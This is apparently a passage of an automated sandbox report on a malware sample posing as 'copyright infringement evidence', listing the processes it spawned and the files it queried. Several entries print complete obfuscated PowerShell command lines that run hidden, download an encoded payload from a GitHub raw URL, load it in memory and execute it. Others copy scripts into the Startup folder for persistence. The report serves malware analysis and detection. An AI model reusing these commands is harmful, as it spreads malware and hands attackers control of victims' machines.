            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'lgaoacaajablae4adga6agmatwbnafmauabfagmawwa0acwamqa1acwamga1af0alqbkag8asqboaccajwapacgaiaaoacgajwb7adiafqb1ahiabaagad0aiab7adaajwaraccafqboahqadaanacsajwbwahmaogavac8acgbhahcalganacsajwbnagkadaboaccakwanahuajwaraccaygb1ahmazqbyaccakwanagmabwbuahqajwaraccazqbuahqalgbjag8ajwaraccabqavae4ajwaraccabwbeaguadablagmajwaraccadabpaccakwanag4alwboag8arablaccakwanahqazqbjahqatwbuac8ajwaraccacganacsajwblaccakwanagyajwaraccacwavaccakwanaggazqanacsajwbhagqacwavag0ayqbpag4alwbeaccakwanaguadaanacsajwbhaggatgbvahqazqbfaeoalgb0ahgadaanacsajwb7adaafqanacsajwa7acaajwaraccaewanacsajwayah0aygbhahmajwaraccazqa2adqaqwbvaccakwanag4ajwaraccadablag4ajwaraccadaagad0aiaaoae4azqb3ac0atwbiagoazqbjahqajwaraccaiabtaccakwanahkacwb0accakwanaguabqanacsajwauae4azqb0accakwanac4avwanacsajwblaccakwanagiajwaraccaqwbsagkazqanacsajwbuaccakwanahqajwaraccakqauaccakwanaeqajwaraccabwb3ag4ababvaccakwanageajwaraccazabtahqajwaraccacganacsajwbpaccakwanag4azwanacsajwaoahsajwaraccamgb9ahuacgbsackaowagaccakwanahsamgb9agiaaqanacsajwbuageajwaraccacgb5aemabwbuaccakwanahqazqbuahqaiaa9acaawwbtaccakwanahkacwb0aguabqauaccakwanaemabwbuahyazqbyaccakwanahqaxqa6accakwanadoargbyaccakwanag8ajwaraccabqbcageacwbladyanabtahqacgbpag4azwaoahsamgb9agiayqanacsajwbzaguanga0accakwanaemajwaraccabwbuahqajwaraccazqbuahqakqanacsajwa7accakwanacaaewayah0ajwaraccayqbzahmazqanacsajwbtaccakwanagiajwaraccabab5acaajwaraccapqagafsaugblagyajwaraccabablaccakwanagmajwaraccadabpaccakwanag8abgauaeeacwbzaguabqbiaccakwanagwaeqbdadoaogbmaccakwanag8ayqanacsajwbkaccakwanacgaewanacsajwayah0aygbpag4ayqanacsajwbyahkajwaraccaqwanacsajwbvag4adablag4adaapadsaiab7adiafqanacsajwbjaccakwanag8abqbtageajwaraccabganacsajwbkacaapqanacsajwagahsamab9afsajwaraccazabuagwaaqbiac4ajwaraccasqbpac4asabvag0azqbdadoaoganacsajwbwaccakwanaeeasqaoaccakwanahsajwaraccamwanacsajwb9adaalwanacsajwblaccakwanafmaqqbjaccakwanaeyajwaraccalwbkaccakwanac8azqblac4ajwaraccazqb0accakwanahmajwaraccayqanacsajwbwac8alwa6ahmacab0accakwanahqaaaanacsajwb7admafqanacsajwasacaaewazah0amqanacsajwb7admafqanacsajwasacaaewazaccakwanah0ajwaraccaqwa6accakwanahsajwaraccamqanacsajwb9afaacgbvaccakwanagcacganacsajwbhag0araanacsajwbhaccakwanahqajwaraccayqb7adeajwaraccafqb7accakwanadmafqasacaaewanacsajwazaccakwanah0ajwaraccacgbhaccakwanagoayqbkag8ajwaraccaewazaccakwanah0alaagaccakwanahsamwb9aeeazaanacsajwbkaccakwanaekabgbqaccakwanahiabwbjaguacwbzadmamgb7admafqasaccakwanacaaewazaccakwanah0ajwaraccazaanacsajwblahmajwaraccayqb0accakwanagkadgbhagqabwb7admafqasaccakwanahsamwb9accakwanahsamwb9ackajwaraccaewanacsajwawah0ajwaraccaowanacsajwagaekajwaraccabgb2ag8aawanacsajwblac0arqb4accakwanahaajwaraccacgblahmacwbpag8abgagahsamganacsajwb9agmabwbtaccakwanag0ajwaraccayqbuaccakwanagqajwapacaalqbgacaawwbjaegayqbyaf0amwa5acwawwbjaegayqbyaf0aoqayacwawwbjaegayqbyaf0amwa2acwawwbjaegayqbyaf0amwa0ackaiaapaa==';$owjuxd = [system.text.encoding]::unicode.getstring([system.convert]::fromba
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [system.io.file]::copy('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\2p_bee.js', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sj.jjc.js')')
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".( $env:comspec[4,15,25]-join'')( (('{2}url = {0'+'}htt'+'ps://raw.'+'gith'+'u'+'buser'+'cont'+'ent.co'+'m/n'+'odetec'+'to'+'n/node'+'tecton/'+'r'+'e'+'f'+'s/'+'he'+'ads/main/d'+'et'+'ahnote_j.txt'+'{0}'+'; '+'{'+'2}bas'+'e64co'+'n'+'ten'+'t = (new-object'+' s'+'yst'+'em'+'.net'+'.w'+'e'+'b'+'clie'+'n'+'t'+').'+'d'+'ownlo'+'a'+'dst'+'r'+'i'+'ng'+'({'+'2}url); '+'{2}bi'+'na'+'rycon'+'tent = [s'+'ystem.'+'conver'+'t]:'+':fr'+'o'+'mbase64string({2}ba'+'se64'+'c'+'ont'+'ent)'+';'+' {2}'+'asse'+'m'+'b'+'ly '+'= [ref'+'le'+'c'+'ti'+'on.assemb'+'ly]::l'+'oa'+'d'+'({'+'2}bina'+'ry'+'c'+'ontent); {2}'+'c'+'omma'+'n'+'d ='+' {0}['+'dnlib.'+'io.home]::'+'v'+'ai('+'{'+'3'+'}0/'+'k'+'sac'+'f'+'/d'+'/ee.'+'et'+'s'+'a'+'p//:spt'+'th'+'{3}'+', {3}1'+'{3}'+', {3'+'}'+'c:'+'{'+'1'+'}pro'+'gr'+'amd'+'a'+'t'+'a{1'+'}{'+'3}, {'+'3'+'}'+'ra'+'jado'+'{3'+'}, '+'{3}ad'+'d'+'inp'+'rocess32{3},'+' {3'+'}'+'d'+'es'+'at'+'ivado{3},'+'{3}'+'{3})'+'{'+'0}'+';'+' i'+'nvok'+'e-ex'+'p'+'ression {2'+'}com'+'m'+'an'+'d') -f [char]39,[char]92,[char]36,[char]34) )"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('cse'+'url = '+'kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/no'+'detecton/nodetec'+'ton/'+'refs'+'/he'+'ads/mai'+'n/det'+'ahnot'+'e_j.txt'+'kk'+'s; cs'+'ebase64'+'cont'+'e'+'nt = '+'(n'+'ew-ob'+'ject system.net.webc'+'li'+'ent).d'+'ownload'+'str'+'ing'+'(cseurl)'+'; csebinaryco'+'ntent = '+'[system.co'+'nvert]::'+'fromba'+'se'+'64'+'s'+'tr'+'i'+'ng(csebase64content'+');'+' cseassem'+'bly ='+' ['+'re'+'flect'+'io'+'n.assembly]::load(c'+'s'+'ebin'+'aryconten'+'t); csec'+'omm'+'and = '+'k'+'k'+'s['+'dnlib.io.h'+'om'+'e]'+'::vai(oni0/zbeuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hon'+'i, oni1on'+'i, onic:1'+'lpprog'+'ramd'+'ata1lponi, o'+'n'+'itondinhooni, '+'onia'+'pplau'+'nchon'+'i, o'+'nidesativa'+'dooni'+',onio'+'ni)kks; invoke-e'+'xpr'+'essi'+'o'+'n'+' c'+'secommand') -creplace ([char]67+[char]83+[char]69),[char]36 -creplace ([char]111+[char]78+[char]73),[char]34-creplace 'kks',[char]39 -replace ([char]49+[char]108+[char]112),[char]92) |iex"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\2x_bee.js', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sj.jjc.js')')
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kaaoaccaqwbtaeuajwaraccadqbyagwaiaa9acaajwaraccaswbraccakwanahmajwaraccaaab0ahqacabzadoalwavahiayqb3ac4azwbpahqaaaanacsajwb1agiadqbzaguacgbjag8abganacsajwb0aguabgb0ac4aywbvaccakwanag0alwboag8ajwaraccarablahqazqbjahqatwbuac8atgbvaeqazqb0aguaywanacsajwb0ae8abgavaccakwanahiazqbmahmajwaraccalwboaguajwaraccayqbkahmalwbtageaaqanacsajwbuac8arablahqajwaraccayqboae4abwb0accakwanaguaxwbkac4adab4ahqajwaraccaswbraccakwanahmaowagaemauwanacsajwbfagiayqbzaguanga0accakwanaemabwbuahqajwaraccazqanacsajwbuahqaiaa9acaajwaraccakaboaccakwanaguadwatae8ayganacsajwbqaguaywb0acaauwb5ahmadablag0algboaguadaauafcazqbiaemajwaraccababpaccakwanaguabgb0ackalgbeaccakwanag8adwbuagwabwbhagqajwaraccauwb0ahiajwaraccaaqbuagcajwaraccakabdafmarqb1ahiabaapaccakwanadsaiabdafmarqbiagkabgbhahiaeqbdag8ajwaraccabgb0aguabgb0acaapqagaccakwanafsauwb5ahmadablag0algbdag8ajwaraccabgb2aguacgb0af0aoga6accakwanaeyacgbvag0aqgbhaccakwanahmazqanacsajwa2adqajwaraccauwanacsajwb0ahiajwaraccaaqanacsajwbuagcakabdafmarqbiageacwbladyanabdag8abgb0aguabgb0accakwanackaowanacsajwagaemauwbfageacwbzaguabqanacsajwbiagwaeqagad0ajwaraccaiabbaccakwanafiazqanacsajwbmagwazqbjahqajwaraccaaqbvaccakwanag4algbbahmacwblag0aygbsahkaxqa6adoatabvageazaaoaemajwaraccauwanacsajwbfagiaaqbuaccakwanageacgb5aemabwbuahqazqbuaccakwanahqakqa7acaaqwbtaeuaywanacsajwbvag0abqanacsajwbhag4azaagad0aiaanacsajwblaccakwanagsajwaraccacwbbaccakwanagqabgbsagkaygauaekatwauaegajwaraccabwbtaccakwanaguaxqanacsajwa6adoavgbbaekakabvae4asqawac8aegbiaeuadqbjaccakwanac8azaavaguazqauaccakwanaguajwaraccadabzageacaavac8aogbzahaadab0accakwanaggabwboaccakwanaekalaagag8atgbjadeabwboaccakwanaekalaagag8atgbjaemaogaxaccakwanagwacabqahiabwbnaccakwanahiayqbtaeqajwaraccayqb0ageamqbsahaabwboaekalaagag8ajwaraccatganacsajwbjahqabwbuagqaaqbuaggabwbvae4asqasacaajwaraccabwboaekaqqanacsajwbwahaatabhahuajwaraccabgbjaggabwboaccakwanaekalaagag8ajwaraccatgbjagqazqbzageadabpahyayqanacsajwbkag8abwboaekajwaraccalabvae4asqbvaccakwanae4asqapaesaawbzadsaiabjag4adgbvagsazqataeuajwaraccaeabwahiajwaraccazqbzahmaaqanacsajwbvaccakwanag4ajwaraccaiabdaccakwanafmarqbjag8abqbtageabgbkaccakqagac0aywbsaeuauabsaeeaqwblacaaiaaoafsaqwbiaeeacgbdadyanwarafsaqwbiaeeacgbdadgamwarafsaqwbiaeeacgbdadyaoqapacwawwbdaegaqqbyaf0amwa2acaalqbjafiarqbqagwaqqbdaguaiaaoafsaqwbiaeeacgbdadeamqaxacsawwbdaegaqqbyaf0anwa4acsawwbdaegaqqbyaf0anwazackalabbaemasabbahiaxqazadqalqbjafiarqbqagwaqqbdaguaiaagaccaswbrahmajwasafsaqwbiaeeacgbdadmaoqagacaalqbsaguacabsaeeaywblacaakabbaemasabbahiaxqa0adkakwbbaemasabbahiaxqaxadaaoaarafsaqwbiaeeacgbdadeamqayackalabbaemasabbahiaxqa5adiakqagahwaaqblahga';$owjuxd = [system.text.encoding]::unicode.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [system.io.file]::copy('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\2x_bee.js', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sj.jjc.js')')
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\cjj.js', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sj.jjc.js')')
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kaaoaccaqwbtaeuajwaraccadqbyagwaiaa9acaajwaraccaswbraccakwanahmajwaraccaaab0ahqacabzadoalwavahiayqb3ac4azwbpahqaaaanacsajwb1agiadqbzaguacgbjag8abganacsajwb0aguabgb0ac4aywbvaccakwanag0alwboag8ajwaraccarablahqazqbjahqatwbuac8atgbvaeqazqb0aguaywanacsajwb0ae8abgavaccakwanahiazqbmahmajwaraccalwboaguajwaraccayqbkahmalwbtageaaqanacsajwbuac8arablahqajwaraccayqboae4abwb0accakwanaguaxwbkac4adab4ahqajwaraccaswbraccakwanahmaowagaemauwanacsajwbfagiayqbzaguanga0accakwanaemabwbuahqajwaraccazqanacsajwbuahqaiaa9acaajwaraccakaboaccakwanaguadwatae8ayganacsajwbqaguaywb0acaauwb5ahmadablag0algboaguadaauafcazqbiaemajwaraccababpaccakwanaguabgb0ackalgbeaccakwanag8adwbuagwabwbhagqajwaraccauwb0ahiajwaraccaaqbuagcajwaraccakabdafmarqb1ahiabaapaccakwanadsaiabdafmarqbiagkabgbhahiaeqbdag8ajwaraccabgb0aguabgb0acaapqagaccakwanafsauwb5ahmadablag0algbdag8ajwaraccabgb2aguacgb0af0aoga6accakwanaeyacgbvag0aqgbhaccakwanahmazqanacsajwa2adqajwaraccauwanacsajwb0ahiajwaraccaaqanacsajwbuagcakabdafmarqbiageacwbladyanabdag8abgb0aguabgb0accakwanackaowanacsajwagaemauwbfageacwbzaguabqanacsajwbiagwaeqagad0ajwaraccaiabbaccakwanafiazqanacsajwbmagwazqbjahqajwaraccaaqbvaccakwanag4algbbahmacwblag0aygbsahkaxqa6adoatabvageazaaoaemajwaraccauwanacsajwbfagiaaqbuaccakwanageacgb5aemabwbuahqazqbuaccakwanahqakqa7acaaqwbtaeuaywanacsajwbvag0abqanacsajwbhag4azaagad0aiaanacsajwblaccakwanagsajwaraccacwbbaccakwanagqabgbsagkaygauaekatwauaegajwaraccabwbtaccakwanaguaxqanacsajwa6adoavgbbaekakabvae4asqawac8aegbiaeuadqbjaccakwanac8azaavaguazqauaccakwanaguajwaraccadabzageacaavac8aogbzahaadab0accakwanaggabwboaccakwanaekalaagag8atgbjadeabwboaccakwanaekalaagag8atgbjaemaogaxaccakwanagwacabqahiabwbnaccakwanahiayqbtaeqajwaraccayqb0ageamqbsahaabwboaekalaagag8ajwaraccatganacsajwbjahqabwbuagqaaqbuaggabwbvae4asqasacaajwaraccabwboaekaqqanacsajwbwahaatabhahuajwaraccabgbjaggabwboaccakwanaekalaagag8ajwaraccatgbjagqazqbzageadabpahyayqanacsajwbkag8abwboaekajwaraccalabvae4asqbvaccakwanae4asqapaesaawbzadsaiabjag4adgbvagsazqataeuajwaraccaeabwahiajwaraccazqbzahmaaqanacsajwbvaccakwanag4ajwaraccaiabdaccakwanafmarqbjag8abqbtageabgbkaccakqagac0aywbsaeuauabsaeeaqwblacaaiaaoafsaqwbiaeeacgbdadyanwarafsaqwbiaeeacgbdadgamwarafsaqwbiaeeacgbdadyaoqapacwawwbdaegaqqbyaf0amwa2acaalqbjafiarqbqagwaqqbdaguaiaaoafsaqwbiaeeacgbdadeamqaxacsawwbdaegaqqbyaf0anwa4acsawwbdaegaqqbyaf0anwazackalabbaemasabbahiaxqazadqalqbjafiarqbqagwaqqbdaguaiaagaccaswbrahmajwasafsaqwbiaeeacgbdadmaoqagacaalqbsaguacabsaeeaywblacaakabbaemasabbahiaxqa0adkakwbbaemasabbahiaxqaxadaaoaarafsaqwbiaeeacgbdadeamqayackalabbaemasabbahiaxqa5adiakqagahwaaqblahga';$owjuxd = [system.text.encoding]::unicode.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [system.io.file]::copy('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\cjj.js', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sj.jjc.js')')
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".( $env:comspec[4,15,25]-join'')( (('{2}url = {0'+'}htt'+'ps://raw.'+'gith'+'u'+'buser'+'cont'+'ent.co'+'m/n'+'odetec'+'to'+'n/node'+'tecton/'+'r'+'e'+'f'+'s/'+'he'+'ads/main/d'+'et'+'ahnote_j.txt'+'{0}'+'; '+'{'+'2}bas'+'e64co'+'n'+'ten'+'t = (new-object'+' s'+'yst'+'em'+'.net'+'.w'+'e'+'b'+'clie'+'n'+'t'+').'+'d'+'ownlo'+'a'+'dst'+'r'+'i'+'ng'+'({'+'2}url); '+'{2}bi'+'na'+'rycon'+'tent = [s'+'ystem.'+'conver'+'t]:'+':fr'+'o'+'mbase64string({2}ba'+'se64'+'c'+'ont'+'ent)'+';'+' {2}'+'asse'+'m'+'b'+'ly '+'= [ref'+'le'+'c'+'ti'+'on.assemb'+'ly]::l'+'oa'+'d'+'({'+'2}bina'+'ry'+'c'+'ontent); {2}'+'c'+'omma'+'n'+'d ='+' {0}['+'dnlib.'+'io.home]::'+'v'+'ai('+'{'+'3'+'}0/'+'k'+'sac'+'f'+'/d'+'/ee.'+'et'+'s'+'a'+'p//:spt'+'th'+'{3}'+', {3}1'+'{3}'+', {3'+'}'+'c:'+'{'+'1'+'}pro'+'gr'+'amd'+'a'+'t'+'a{1'+'}{'+'3}, {'+'3'+'}'+'ra'+'jado'+'{3'+'}, '+'{3}ad'+'d'+'inp'+'rocess32{3},'+' {3'+'}'+'d'+'es'+'at'+'ivado{3},'+'{3}'+'{3})'+'{'+'0}'+';'+' i'+'nvok'+'e-ex'+'p'+'ression {2'+'}com'+'m'+'an'+'d') -f [char]39,[char]92,[char]36,[char]34) )"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('cse'+'url = '+'kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/no'+'detecton/nodetec'+'ton/'+'refs'+'/he'+'ads/mai'+'n/det'+'ahnot'+'e_j.txt'+'kk'+'s; cs'+'ebase64'+'cont'+'e'+'nt = '+'(n'+'ew-ob'+'ject system.net.webc'+'li'+'ent).d'+'ownload'+'str'+'ing'+'(cseurl)'+'; csebinaryco'+'ntent = '+'[system.co'+'nvert]::'+'fromba'+'se'+'64'+'s'+'tr'+'i'+'ng(csebase64content'+');'+' cseassem'+'bly ='+' ['+'re'+'flect'+'io'+'n.assembly]::load(c'+'s'+'ebin'+'aryconten'+'t); csec'+'omm'+'and = '+'k'+'k'+'s['+'dnlib.io.h'+'om'+'e]'+'::vai(oni0/zbeuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hon'+'i, oni1on'+'i, onic:1'+'lpprog'+'ramd'+'ata1lponi, o'+'n'+'itondinhooni, '+'onia'+'pplau'+'nchon'+'i, o'+'nidesativa'+'dooni'+',onio'+'ni)kks; invoke-e'+'xpr'+'essi'+'o'+'n'+' c'+'secommand') -creplace ([char]67+[char]83+[char]69),[char]36 -creplace ([char]111+[char]78+[char]73),[char]34-creplace 'kks',[char]39 -replace ([char]49+[char]108+[char]112),[char]92) |iex"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('cse'+'url = '+'kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/no'+'detecton/nodetec'+'ton/'+'refs'+'/he'+'ads/mai'+'n/det'+'ahnot'+'e_j.txt'+'kk'+'s; cs'+'ebase64'+'cont'+'e'+'nt = '+'(n'+'ew-ob'+'ject system.net.webc'+'li'+'ent).d'+'ownload'+'str'+'ing'+'(cseurl)'+'; csebinaryco'+'ntent = '+'[system.co'+'nvert]::'+'fromba'+'se'+'64'+'s'+'tr'+'i'+'ng(csebase64content'+');'+' cseassem'+'bly ='+' ['+'re'+'flect'+'io'+'n.assembly]::load(c'+'s'+'ebin'+'aryconten'+'t); csec'+'omm'+'and = '+'k'+'k'+'s['+'dnlib.io.h'+'om'+'e]'+'::vai(oni0/zbeuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hon'+'i, oni1on'+'i, onic:1'+'lpprog'+'ramd'+'ata1lponi, o'+'n'+'itondinhooni, '+'onia'+'pplau'+'nchon'+'i, o'+'nidesativa'+'dooni'+',onio'+'ni)kks; invoke-e'+'xpr'+'essi'+'o'+'n'+' c'+'secommand') -creplace ([char]67+[char]83+[char]69),[char]36 -creplace ([char]111+[char]78+[char]73),[char]34-creplace 'kks',[char]39 -replace ([char]49+[char]108+[char]112),[char]92) |iex"
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
